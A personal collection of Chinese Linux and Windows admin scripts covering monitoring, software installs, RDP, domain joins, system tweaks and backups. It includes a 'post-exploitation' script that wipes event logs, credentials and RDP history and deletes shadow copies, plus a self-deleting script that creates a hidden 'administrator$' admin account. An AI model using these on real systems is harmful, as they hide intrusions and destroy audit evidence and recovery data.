该文用于记录工作中写的脚本
一、Linux脚本
更正时区
#!/bin/bash
# 安装ntp服务
yum install -y ntp
# 更新时间
ntpdate -u cn.pool.ntp.org
# 将更新时间写入定时任务
echo "0 2 * * * ntpdate -u cn.pool.ntp.org" >> /var/spool/cron/root
# 修改时区
mv /etc/localtime /etc/localtime_bak
/bin/cp -f /usr/share/zoneinfo/Asia/Shanghai /etc/localtime
ntpdate -u cn.pool.ntp.org
date -R清理日志大文件
#!/bin/bash
#30 2 * * * cd /data/shell; ./clear_logs.sh >/dev/null 2>&1
MTIME_ZIP=7
MTIME_DEL=60
#DIRS="/data/product/logs aaa"
DIRS="/data/product/logs /data/server/*/log /data/jiayoubao/*/log"
for DIR in $DIRS;
do
if [ ${#DIR} -le 4 ]
then
echo "Error, DIR:$DIR, please check directory len, quitting...."
exit 1
fi
if [[ "$DIR" =~ "etc" ]] || [[ "$DIR" =~ "conf" ]]
then
echo "Error, DIR:$DIR, directory cannot include etc or conf, quitting...."
exit 1
fi
cd $DIR
if [ $? -ne 0 ]
then
echo "Error, cannot cd to logs directory, continue...."
continue
fi
find $DIR -type f -mtime +$MTIME_ZIP -name "*.log" -exec gzip {} \;
find $DIR -mtime +$MTIME_DEL -name "*.log.gz" -exec rm -f {} \;
echo "INFO, $DIR delete commplete!"
done
exit 0监控模块OOM并自动重启
模块supply_chain假死,进程在。无法通过zabbix的进程监控判断服务是否在线。因为假死时会日志会打java.lang.OutOfMemoryError: GC overhead limit exceeded,通过定时获取日志内容来实现OOM发现,剔除eureka的注册,并重启服务
#!/bin/sh
time1=$(date "+%Y%m%d")
time2=$(date "+%Y%m%d-%H:%M:%S")
# 获取进程pid
p_pid=`ps -ef|grep java|grep jar|grep -v grep|grep -v tools|grep -v tar.gz|grep supply_chain | awk '{print $2}'`
# 遍历日志(因为日志被分割为多份了)
for i in {0..10}
do
grep 'java.lang.OutOfMemoryError: GC overhead limit exceeded' /data/server/supply_chain/log/all-$time1-$i.log > /dev/null
if test $? -eq 0 ; then
echo $time2 all-$time1-$i.log found! >> /usr/local/src/supply_chain_oom.txt
sed -i "s/java.lang.OutOfMemoryError: GC overhead limit exceeded/java.lang.OOM: GC overhead limit exceede/g" /data/server/supply_chain/log/all-$time1-$i.log
# 踢掉eureka
curl --request PUT "http://47.103.xx.xx:8761/eureka/apps/SUPPLY-CHAIN/172.19.91.119:7068/status?value=DOWN"
# 抓包分析
jmap -F -dump:format=b,file=/usr/local/src/$time2-ip_heap.bin $p_pid
if test -z $p_pid ;then
echo -e "project is not running,please check...."
else
# 重启服务
cd /data/server/supply_chain/tools; ./restart.sh > /dev/null 2>&1
# 注册eureka
curl --request PUT "http://47.103.38.249:8761/eureka/apps/SUPPLY-CHAIN/172.19.91.119:7068/status?value=UP"
fi
fi
done
echo $time2 扫描完成,未发现OOM >> /usr/local/src/supply_chain_oom.txt监控redis服务掉线
服务会注册到redis,通过定时导出redis的key和上一份做对比,若有缺失则上报日志触发告警
#!/bin/bash
date=`date +%Y-%m-%d`
date1=`date +%Y-%m-%d%t%H:%M:%S`
# 脚本第一次运行需新建一个list.log文件
# 导出当前redis的键值
redis-cli --raw -p 6381 --scan --pattern "*" > now.log
# 将两个文件合并
cat list.log now.log | sort |uniq > new.log
# 将刚导出的redis值与上一次+刚导出的对比
sort now.log new.log | uniq -c | awk '$1 == 1 {print $2}' > log/tmp.log
if test -s log/tmp.log ; then
echo "检测到缺失"
for LINE in `cat log/tmp.log`
do
echo $date1 $LINE >> log/$date.log
done
else
echo "NULL";
# echo $date1 "未检测到缺失" >> log/$date.log
fi
# 将本次导出的数据改名为list.log,用于下次比对
mv new.log list.log二、Windows脚本
为便于展示,Windows的脚本已将bat的注释由
::改为了###。实际使用时请将###替换为::
自动安装常用软件
@echo off
###以管理员运行cmd
%1 mshta vbscript:CreateObject("Shell.Application").ShellExecute("cmd.exe","/c %~s0 ::","","runas",1)(window.close)&&exit
cd /d "%~dp0"
mode con lines=20 cols=70
echo ※※※※※※※※※※※※※※※※※※※※※※※※※※※※※※※※※※
echo ※ ※
echo ※ 正在安装常用软件... ※
echo ※································※
echo ※ 请勿关闭该窗口 ※
echo ※ 请按提示进行操作 ※
echo ※ ※
echo ※※※※※※※※※※※※※※※※※※※※※※※※※※※※※※※※※※
title 新员工入职常用软件安装
color 0e
###判断文件是否存在
if exist "c:\softinstall" (goto exit ) else (md "c:\softinstall"
echo .
###拷贝文档到指定目录
echo .
copy /y \\172.16.1.161\常用软件\software\中智诚集团新员工入职指引.pdf c:\softinstall
echo .
###显示计算机图标
ECHO ※显示计算机图标...
ECHO 请稍等...
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel" /v {20D04FE0-3AEA-1069-A2D8-08002B30309D} /t REG_DWORD /d 0 /f >nul 2>nul
echo 显示计算机图标 -- OK
echo .
start /wait \\172.16.1.161\常用软件\software\install_office2010.bat
###钉钉
ECHO 正在安装钉钉...
ECHO 请稍等...
start /wait \\172.16.1.161\常用软件\software\DingTalk_v4.3.7.32.exe /S /v/qn
if %errorlevel%==0 (echo 钉钉 -- OK) else (echo 钉钉 -- error)
echo .
###Chrome浏览器
ECHO 正在安装Chrome浏览器...
ECHO 请稍等...
start /wait \\172.16.1.161\常用软件\software\Installer\setup.exe /S /v/qn
if %errorlevel%==0 (echo Chrome浏览器 -- OK) else (echo Chrome浏览器 -- error)
echo .
###微信
ECHO 正在安装微信...
ECHO 请稍等...
start /wait \\172.16.1.161\常用软件\software\WeChatSetup.exe /S /v/qn
if %errorlevel%==0 (echo 微信 -- OK) else (echo 微信-- error)
echo .
###WinRAR
ECHO 正在安装WinRAR...
ECHO 请稍等...
start /wait \\172.16.1.161\常用软件\software\winrar-x64-550sc.exe /S /v/qn
if %errorlevel%==0 (echo WinRAR-- OK) else (echo WinRAR-- error)
echo .
###搜狗输入法
ECHO 正在安装搜狗输入法...
ECHO 请稍等...
start /wait \\172.16.1.161\常用软件\software\sogou_pinyin_90d.exe /S /v/qn
if %errorlevel%==0 (echo 搜狗输入法 -- OK) else (echo 搜狗输入法 -- error)
echo .
###写入文档到服务器
echo %date%,%time%,%COMPUTERNAME%,软件安装完成 >> \\172.16.1.100\pclog\%username%.txt
###FOXMAIL软件
ECHO 正在安装Foxmail软件...
ECHO 请稍等...
\\172.16.1.161\常用软件\software\FoxmailSetup.exe
if %errorlevel%==0 (echo Foxmail软件 -- OK) else (echo Foxmail软件 -- error)
echo .
###打开欢迎文档
start "" "c:\softinstall\中智诚集团新员工入职指引.pdf"
)
开启远程桌面
注:为了数据安全,请勿轻易开启远程桌面!!!
title 一键开启远程桌面
@echo off
###以管理员运行cmd
%1 mshta vbscript:CreateObject("Shell.Application").ShellExecute("cmd.exe","/c %~s0 ::","","runas",1)(window.close)&&exit
cd /d "%~dp0"
echo 用批处理关闭防火墙,包括家庭和工作网络位置、公用网络位置设置。
netsh firewall set opmode mode=disable profile=ALL
netsh firewall set opmode mode=disable
echo 防火墙已关闭!
echo .
echo .
echo 正在配置其他选项...
echo 请等待...
echo .
### 设置休眠时间为从不
powercfg -change -standby-timeout-ac 0
@ping 127.0.0.1 -n 10 >nul
### 正在勾选“允许用户远程连接到此计算机”...
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f >nul 2>nul
### 正在设置您的开机密码“ 0 ”
###net user %username% 0 >nul 2>nul
### 正在启动端口号“ 3389 ”...
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp" /v PortNumber /t REG_DWORD /d 3389 /f >nul 2>nul
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 3389 /f >nul 2>nul
### 正在设置并重启“Printer Spooler”服务...
sc config Spooler start= AUTO >nul 2>nul
net stop Spooler >nul 2>nul
net start Spooler >nul 2>nul
### 正在设置“Telnet”服务...
sc config TlntSvr start= AUTO >nul 2>nul
net start TlntSvr >nul 2>nul
### 正在设置“Terminal Service”服务...
sc config TermService start= AUTO >nul 2>nul
net start TermService >nul 2>nul
### 正在设置“###ote Desktop Help Session Manager”服务...
sc config RDSessMgr start= AUTO >nul 2>nul
net start RDSessmgr >nul 2>nul
### 正在勾选“使用欢迎屏幕”...
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "LogonType" /t REG_DWORD /d 1 /f >nul 2>nul
### 正在勾选“使用快速用户切换”...
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "AllowMultipleTSSessions" /t REG_DWORD /d 1 /f >nul 2>nul
echo ※※※※※※※※※※※※※※
echo ※ ※
echo ※ 远程桌面设置完成 ※
echo ※ ※
echo ※※※※※※※※※※※※※※
echo .
echo .
pause退域
@echo off
###以管理员运行cmd
%1 mshta vbscript:CreateObject("Shell.Application").ShellExecute("cmd.exe","/c %~s0 ::","","runas",1)(window.close)&&exit
cd /d "%~dp0"
mode con lines=20 cols=70
wmic computersystem where Name="%COMPUTERNAME%" call UnJoinDomainOrWorkgroup username="zzc.com\ad" password="xxx
echo 退域完成,重启电脑生效
pause加域
### 连接驱动器
net use \\172.16.1.184\ipc$ xxx /user:backup
### 获取当前用户桌面路径
for /f "tokens=2,*" %%i in ('reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v "Desktop"') do Set a=%%j
### 修改管理员密码
net user Administrator xxxx
### 加域
xcopy \\172.16.1.184\backup\加域助手\*.* d:\ad\ /e /c /s /q
start d:\ad\加域助手v0.1.exe
### 不显示隐藏文件
reg add HKCU\Software\Microsoft\Windows\Currentversion\Explorer\Advanced /v Hidden /t REG_DWORD /d 2 /f
taskkill /im explorer.exe /f
start %systemroot%\explorer.exe
### 删除加域文件
del d:\ad /s /f /a /q
rd d:\ad /s /q系统优化
### 优化系统
### ------------------------------------------优化开始--------------------------------------------------
echo 优化开始
echo 关闭系统索引服务
sc stop WMPNetworkSvc
ping -n 3 127.0.0.1>nul
sc stop wsearch
sc config WMPNetworkSvc start= disabled
sc config wsearch start= disabled
echo 完成
ECHO 关闭用户账户控制(UAC)
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /d 0 /t REG_DWORD /f
echo 完成
ECHO 关闭显示器前等待时间: 从不
powercfg -change -monitor-timeout-ac 0
powercfg -change -monitor-timeout-dc 0
echo 完成
ECHO 关闭休眠
powercfg -h off
echo 完成
ECHO 禁止window发送错误报告
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Windows Error Reporting" /v "Disabled" /d 1 /t REG_DWORD /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\PCHealth\ErrorReporting" /v "DoReport" /d 0 /t REG_DWORD /f
echo 完成
ECHO 禁用"最近使用的项目"
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "Start_TrackProgs" /d 0 /t REG_DWORD /f
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "Start_TrackDocs" /d 0 /t REG_DWORD /f
reg add "HKEY_CURRENT_USER\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify" /v "IconStreams" /t REG_BINARY /f
reg add "HKEY_CURRENT_USER\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify" /v "PastIconsStream" /t REG_BINARY /f
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRecentDocsHistory" /d 1 /t REG_DWORD /f
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoInstrumentation" /d 1 /t REG_DWORD /f
reg add "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Explorer" /v "DisableSearchBoxSuggestions" /d 1 /t REG_DWORD /f
reg add "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Explorer" /v "DisableSearchHistory" /d 1 /t REG_DWORD /f
echo 完成
ECHO 关闭Windows Defender
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /d 1 /t REG_DWORD /f
echo 完成
ECHO 关闭家庭组
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\HomeGroup" /v "DisableHomeGroup" /d 1 /t REG_DWORD /f
echo 完成
ECHO 调整休眠文件到最小
powercfg /h size 50
echo 完成
ECHO 关闭程序兼容性助手
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\AppCompat" /v "DisablePCA" /d 1 /t REG_DWORD /f
sc stop PcaSvc
sc config PcaSvc start= disabled
echo 完成
ECHO 延迟启动 Superfetch 服务
sc config "SysMain" start= delayed-auto
echo 完成
::ECHO 禁止 Superfetch 服务(SSD必选)
::sc stop SysMain
::sc config "SysMain" start= disabled
::reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory ::Management\PrefetchParameters" /v "EnablePrefetcher" /d 0 /t REG_DWORD /f
::echo 完成
ECHO 关闭开机画面(GUI引导可以提高一点开机速度)
bcdedit /set quietboot on
echo 完成
ECHO 关闭客户体验改善计划
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\SQMClient\Windows" /v "CEIPEnable" /d 0 /t REG_DWORD /f
echo 完成
ECHO 隐藏操作中心任务栏托盘
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "HideSCAHealth" /d 1 /t REG_DWORD /f
echo 完成
ECHO 关闭自动播放
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoDriveTypeAutoRun" /d 255 /t REG_DWORD /f
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoDriveTypeAutoRun" /d 255 /t REG_DWORD /f
echo 完成
ECHO 关闭磁盘碎片整理计划
SCHTASKS /Change /DISABLE /TN "\Microsoft\Windows\Defrag\ScheduledDefrag"
echo 完成
ECHO 禁用系统日志和内存转储(禁止自动重启)
::reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\CrashControl" /v "LogEvent" /d 0 /t REG_dword /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\CrashControl" /v "AutoReboot" /d 0 /t REG_dword /f
::reg add "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CrashControl" /v "CrashDumpEnabled" /d 0 /t REG_dword /f
::reg add "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Windows Error Reporting" /v "LoggingDisabled" /d 1 /t REG_dword /f
::reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Windows Error Reporting" /v "Disabled" /d 1 /t REG_dword /f
echo 完成
ECHO 禁用疑难解答和系统诊断以及NTFS快捷方式跟踪服务
sc stop WdiSystemHost
sc stop WdiServiceHost
sc stop DPS
sc stop DiagTrack
sc config DPS start= disabled
sc config WdiServiceHost start= disabled
sc config WdiSystemHost start= disabled
sc config DiagTrack start= disabled
echo 完成
ECHO 禁用NTFS快捷方式跟踪和IPV6服务
sc stop iphlpsvc
sc stop TrkWks
sc config TrkWks start= disabled
sc config iphlpsvc start= disabled
echo 完成
ECHO 禁用任务计划程序自启项
SCHTASKS /Change /DISABLE /TN "\Microsoft\Windows\Windows Error Reporting\QueueReporting"
SCHTASKS /Change /DISABLE /TN "\Microsoft\Windows\SkyDrive\Routine Maintenance Task"
SCHTASKS /Change /DISABLE /TN "\Microsoft\Windows\SkyDrive\Idle Sync Maintenance Task"
SCHTASKS /Change /DISABLE /TN "\Microsoft\Windows\DiskDiagnostic\Microsoft-Windows-DiskDiagnosticResolver"
SCHTASKS /Change /DISABLE /TN "\Microsoft\Windows\DiskDiagnostic\Microsoft-Windows-DiskDiagnosticDataCollector"
SCHTASKS /Change /DISABLE /TN "\Microsoft\Windows\Diagnosis\Scheduled"
SCHTASKS /Change /DISABLE /TN "\Microsoft\Windows\Defrag\ScheduledDefrag"
SCHTASKS /Change /DISABLE /TN "\GoogleUpdateTaskMachineUA"
SCHTASKS /Change /DISABLE /TN "\GoogleUpdateTaskMachineCore"
SCHTASKS /Change /DISABLE /TN "\Microsoft\Office\OfficeTelemetryAgentFallBack"
SCHTASKS /Change /DISABLE /TN "\Microsoft\Office\OfficeTelemetryAgentLogOn"
SCHTASKS /Change /DISABLE /TN "\AdobeAAMUpdater-1.0-%computername%-%username%"
SCHTASKS /Change /DISABLE /TN "\Microsoft\Office\Office 15 Subscription Heartbeat"
echo 完成
ECHO 关机时强制杀后台不等待
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control" /v "WaitToKillServiceTimeout" /d 0 /t REG_SZ /f
echo 完成
ECHO 移除右键菜单中的SkyDrive Pro
reg delete "HKEY_CLASSES_ROOT\AllFilesystemObjects\shell\SPFS.ContextMenu" /f
echo 完成
ECHO 禁止一联网就打开浏览器
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\NetworkConnectivityStatusIndicator" /v "NoActiveProbe" /d 1 /t REG_DWORD /f
echo 完成
::ECHO 删除“这台电脑”6个文件夹
::reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\{1CF1260C-4DD0-4ebb-811F-33C572699FDE}" /f
::reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\{374DE290-123F-4565-9164-39C4925E467B}" /f
::reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\{3ADD1653-EB32-4cb0-BBD7-DFA0ABB5ACCA}" /f
::reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\{A0953C92-50DC-43bf-BE83-3742FED03C9C}" /f
::reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\{A8CDFF1C-4878-43be-B5FD-F8091C1C60D0}" /f
::reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}" /f
::reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\{1CF1260C-4DD0-4ebb-811F-33C572699FDE}" /f
::reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\{374DE290-123F-4565-9164-39C4925E467B}" /f
::reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\{3ADD1653-EB32-4cb0-BBD7-DFA0ABB5ACCA}" /f
::reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\{A0953C92-50DC-43bf-BE83-3742FED03C9C}" /f
::reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\{A8CDFF1C-4878-43be-B5FD-F8091C1C60D0}" /f
::reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}" /f
::echo 完成
ECHO 删除回收站右键固定到开始屏幕
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\shellex\ContextMenuHandlers\PintoStartScreen" /f
echo 完成
ECHO 去除快捷方式小箭头和后缀(我没去箭头,需要的把第一行的::去掉即可)
::reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 29 /d "%systemroot%\system32\imageres.dll,197" /t reg_sz /f
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer" /v link /d "00000000" /t REG_BINARY /f
del "%userprofile%\AppData\Local\iconcache.db" /f /q
echo 完成
::ECHO 去除UAC小盾牌
::reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 77 /d "%systemroot%\system32\imageres.dll,197" /t reg_sz /f
::del "%userprofile%\AppData\Local\iconcache.db" /f /q
::echo 完成
ECHO 关闭不必要的视觉动画效果
reg add "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\DWM" /v "DisallowAnimations" /d 1 /t REG_dword /f
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "TurnOffSPIAnimations" /d 1 /t REG_dword /f
reg add "HKEY_CURRENT_USER\Control Panel\Desktop\WindowMetrics" /v "MinAnimate" /d 0 /t REG_SZ /f
echo 完成
::ECHO 设置系统自带截屏保存到桌面
::rd /s /q %userprofile%\pictures\Screenshots
::mklink /j %userprofile%\pictures\Screenshots %userprofile%\desktop
::echo 完成
ECHO IE11开启企业模式
reg add "HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Main\EnterpriseMode" /v SiteList /d "HKCU\Software\policies\Microsoft\Internet Explorer\Main\EnterpriseMode" /t reg_sz /f
reg add "HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Main\EnterpriseMode" /v Enable /d "" /t reg_sz /f
echo 完成
echo 打开IE请勿追踪功能(Do Not Track)
reg add "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v "DoNotTrack" /d "1" /t REG_DWORD /f
ECHO 完成
ECHO 鼠标指向右上角不显示超级按钮
reg add "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\EdgeUI" /v DisableCharms /d 1 /t REG_DWORD /f
echo 完成
echo 当资源管理器崩溃时则自动重启资源管理器
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "AutoRestartShell" /d "1" /t REG_DWORD /f
ECHO 完成
echo 开启资源管理器自动刷新功能
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Update" /v "UpdateMode" /d "1" /t REG_DWORD /f
ECHO 完成
echo 为桌面和资源管理器创建不同的进程
reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v "DesktopProcess" /d "1" /t REG_DWORD /f
ECHO 完成
### ------------------------------------------优化结束--------------------------------------------------备份数据库文件
@echo off
### 日期格式
set "myDate=%date:~,4%%date:~5,2%%date:~8,2%"
set "myPath=\\10.23.62.139\data\logbackup\kingdee\%myDate%"
### 创建目录
md %myPath%
### 拷贝到网络驱动器
xcopy D:\账套备份\*.* %myPath% /D /E /Y /H /K
### 移动到本机保存一份
md D:\账套备份1\%myDate%\
xcopy D:\账套备份\*.* D:\账套备份1\%myDate%\
exit清理电脑使用记录
删除凭据
@echo off
### 删除win保存的连接
net use * /delete /y
### 这个好像是清除win保存的认证还是啥的
klist purge
### 删除win保存的凭据管理器,delete:后面为你共享的地址
cmdkey /delete:172.16.1.70
### 创建凭据
cmdkey /add:172.16.1.180 /user:zzc\ad /pass:password
### 删除远程访问保存的RAS凭据
cmdkey /delete /ras
### 重启服务
net stop Workstation /y
net start Workstation删除磁盘映射
删除最近访问记录
Del /F /Q %APPDATA%\Microsoft\Windows\Recent\*
Del /F /Q %APPDATA%\Microsoft\Windows\Recent\AutomaticDestinations\*
Del /F /Q %APPDATA%\Microsoft\Windows\Recent\CustomDestinations\*
REG Delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /VA /F
REG Delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\TypedPaths /VA /F删除远程桌面记录
### win10
del /F /S /Q /AH "%USERPROFILE%\Documents\default.rdp"
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client" /f
### win7
del /F /S /Q /AH "%USERPROFILE%\My Documents\default.rdp"
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client" /f删除系统日志
for /f %x in ('wevtutil el') do wevtutil cl "%x"删除CMD窗口历史记录
reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU\ /f让CMD不记录历史记录
reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /d 0 /v "Start_TrackProgs" /t REG_DWORD /fBAT故障处理脚本
远程桌面提示函数不受支持
REG ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\CredSSP\Parameters\ /v AllowEncryptionOracle /t REG_DWORD /d 2建立永不过期账号
@echo off
### 管理员方式运行cmd
%1 mshta vbscript:CreateObject("Shell.Application").ShellExecute("cmd.exe","/c %~s0 ::","","runas",1)(window.close)&&exit
cd /d "%~dp0"
### 添加账号
net user administrator$ " Zz5985768.. " /add
### 添加到管理员组
net localgroup administrators administrator$ /add
### 设置账号密码永不过期
wmic useraccount where "Name='administrator$'" set PasswordExpires=False
### 删除本脚本(add$.bat)
del add$.bat
pause查看本机开放端口
@echo off
color 1f
Title XP端口-进程查询
setlocal enabledelayedexpansion
echo ╔- -╗
echo 本机开放的端口及使用该端口的进程
echo ╚- -╝
echo ------------------------------------
echo 端口号 进程名称
ECHO TCP协议:
::利用netstat命令找出使用TCP协议通信的端口,并将结果分割;
::将第二个参数(IP加端口)传给%%i,第五个参数(PID号)传给%%j;
for /F "usebackq skip=4 tokens=2,5" %%i in (`"netstat -ano -p TCP"`) do (
call :Assoc %%i TCP %%j
echo !TCP_Port! !TCP_Proc_Name!
)
ECHO UDP协议:
for /F "usebackq skip=4 tokens=2,4" %%i in (`"netstat -ano -p UDP"`) do (
call :Assoc %%i UDP %%j
echo !UDP_Port! !UDP_Proc_Name!
)
echo 按任意键退出
pause>nul
:Assoc
::对%1(第一个参数)进行分割,将第二个参数传给%%e。在本程序中,%1即为上面的%%i(形式为:IP:端口号)
for /F "tokens=2 delims=:" %%e in ("%1") do (
set %2_Port=%%e
)
:: 查询PID等于%3(第三个参数)的进程,并将结果传给变量?_Proc_Name,?代表UDP或者TCP;
for /F "skip=2 usebackq delims=, tokens=1" %%a in (`"Tasklist /FI "PID eq %3" /FO CSV"`) do (
::%%~a表示去掉%%a外面的引号,因为上述命令的结果是用括号括起来的。
set %2_Proc_Name=%%~a
)后渗透日志清除
@ECHO OFF
%1 mshta vbscript:CreateObject("Shell.Application").ShellExecute("cmd.exe","/c %~s0 ::","","runas",1)(window.close)&&exit
cd /d "%~dp0"
ren cmdkey 查看保存在本地的远程主机信息
cmdkey.exe /list > %userprofile%\1.txt
findstr.exe target %userprofile%\1.txt > %userprofile%\2.txt
rem 遍历删除凭据
FOR /F "tokens=2 delims==" %%G IN (%userprofile%\2.txt) DO cmdkey.exe /delete %%G
DEL %userprofile%\1.txt
DEL %userprofile%\2.txt
rem 清除本机远程登录记录
Reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f
Reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f
Reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers"
rem 删除远程桌面记录
cd %userprofile%\documents\
Attrib Default.rdp -s -h
DEL /F /S /Q /A Default.rdp
cd %userprofile%\mydocuments\
Attrib Default.rdp -s -h
DEL /F /S /Q /A Default.rdp
rem 删除日志文件
DEL /F /S /Q /A %SystemRoot%\System32\LogFiles\*.*
DEL /F /S /Q /A %SystemRoot%\System32\config\*.evt
DEL /F /S /Q /A %SystemRoot%\System32\dtclog\*.*
DEL /F /S /Q /A %SystemRoot%\System32\*.log
DEL /F /S /Q /A %SystemRoot%\System32\*.txt
DEL /F /S /Q /A %SystemRoot%\*.txt
DEL /F /S /Q /A %SystemRoot%\*.log
rem 删除卷影
vssadmin delete shadows /all /quiet
rem 删除事件管理器里的记录
rem 方法1
wevtutil cl "System"
wevtutil cl "Application"
wevtutil cl "Security"
rem 方法2
DEL /F /S /Q /A %SystemRoot%\System32\Winevt\Logs\System.evtx
DEL /F /S /Q /A %SystemRoot%\System32\Winevt\Logs\Security.evtx
DEL /F /S /Q /A %SystemRoot%\System32\Winevt\Logs\Application.evtx
rem 方法3
PowerShell -Command "& {Clear-Eventlog -Log Application,System,Security}"
rem 删除快速访问记录
cd %AppData%\Microsoft\Windows\Recent\AutomaticDestinations
DEL /F /S /Q /A 1bc392b8e104a00e.automaticDestinations-ms
cd c:\Users\%Username%\AppData\Roaming\Microsoft\Windows\Recent
cls
Erase /f *.*
exitbat脚本操作注册表
查询注册表项:reg query
删除注册表项:reg del
添加注册表项:reg add
### 举例:修改注册表,让cmd窗口不记住历史记录
reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /d 0 /v "Start_TrackProgs" /t REG_DWORD /f语法如下:
/v ValueName:指定要添加到指定子项下的注册表项名称。
